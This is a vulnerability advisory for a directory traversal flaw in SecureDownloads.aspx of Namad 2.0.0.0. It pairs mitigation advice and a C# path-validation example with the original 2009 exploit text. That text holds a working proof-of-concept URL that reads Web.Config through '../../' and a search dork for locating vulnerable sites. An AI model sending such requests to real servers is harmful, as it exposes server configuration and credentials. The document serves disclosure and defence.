Vendor: Namad
By: Securitylab.ir
CVSS: 6.4 (MEDIUM)
Title: Remote File Download Vulnerability
CWE: 434
Product Name: Namad
Affected Version From: 2.0.0.0
Affected Version To: 2.0.0.0
Patch Exists: NO
Related CWE: N/A
CPE: a:imenafzar:namad:2.0.0.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Remote File Download Vulnerability

A remote file download vulnerability exists in Namad version 2.0.0.0. An attacker can exploit this vulnerability to download sensitive files from the server. The vulnerability is present in the SecureDownloads.aspx page, which allows an attacker to download any file from the server by manipulating the FileName parameter.

Mitigation:

Ensure that SecureDownloads.aspx is not vulnerable to directory traversal. Validate the FileName parameter and reject any value that contains traversal sequences or otherwise points outside the files the page is meant to serve.
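
One way to validate the FileName parameter, as an added example that is not Namad's code or part of the original advisory: resolve the requested name against a fixed download directory and refuse anything that canonicalizes outside it. The class `DownloadPathGuard`, its `Resolve` method and the sample directory are hypothetical.

```csharp
using System;
using System.IO;

// Added example: hypothetical helper, not code from Namad.
public static class DownloadPathGuard
{
    // Returns the canonical path when fileName stays inside downloadRoot, otherwise null.
    public static string Resolve(string downloadRoot, string fileName)
    {
        if (string.IsNullOrEmpty(fileName)) return null;

        // Canonical root with exactly one trailing separator, so that
        // "C:\downloads-old" cannot pass a prefix check for "C:\downloads".
        string root = Path.GetFullPath(downloadRoot).TrimEnd(
            Path.DirectorySeparatorChar, Path.AltDirectorySeparatorChar)
            + Path.DirectorySeparatorChar;

        string candidate;
        try
        {
            // GetFullPath collapses "." and ".." segments; Combine returns a rooted
            // fileName unchanged, which the prefix check below then rejects.
            candidate = Path.GetFullPath(Path.Combine(root, fileName));
        }
        catch (Exception ex) when (ex is ArgumentException || ex is NotSupportedException
                                   || ex is PathTooLongException)
        {
            return null; // malformed path input
        }

        // Case-insensitive comparison assumes a Windows file system (ASP.NET on IIS).
        if (!candidate.StartsWith(root, StringComparison.OrdinalIgnoreCase)) return null;

        // Defense in depth: never serve configuration files, even from inside the root.
        if (string.Equals(Path.GetExtension(candidate), ".config",
                          StringComparison.OrdinalIgnoreCase)) return null;
        return candidate;
    }

    public static void Main()
    {
        // Constructed sample directory and inputs.
        string root = Path.Combine(Path.GetTempPath(), "downloads");
        foreach (string name in new[] { "report.pdf", "../../Web.Config", "sub/../notes.txt" })
            Console.WriteLine("{0,-20} -> {1}", name, Resolve(root, name) ?? "rejected");
    }
}
```

The check runs on the canonicalized path rather than on the raw string, so encoded or nested traversal sequences that survive request decoding are judged by where they actually resolve.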

Exploit-DB raw data:

######################### Securitylab.ir ########################
# Application Info:
# Name: Namad
# Version: 2.0.0.0
# Website: http://imenafzar.com
#################################################################
# Discovered By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Remote File Download Vulnerability
# Risk: Medium
# Dork: "Copyright 2008 ImenAfzar ver :2.0.0.0"
#===========================================================
# http://site.ir/SecureDownloads.aspx?Mode=Downloads&Type=Files&FileName=../../Web.Config
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################

# milw0rm.com [2009-05-19]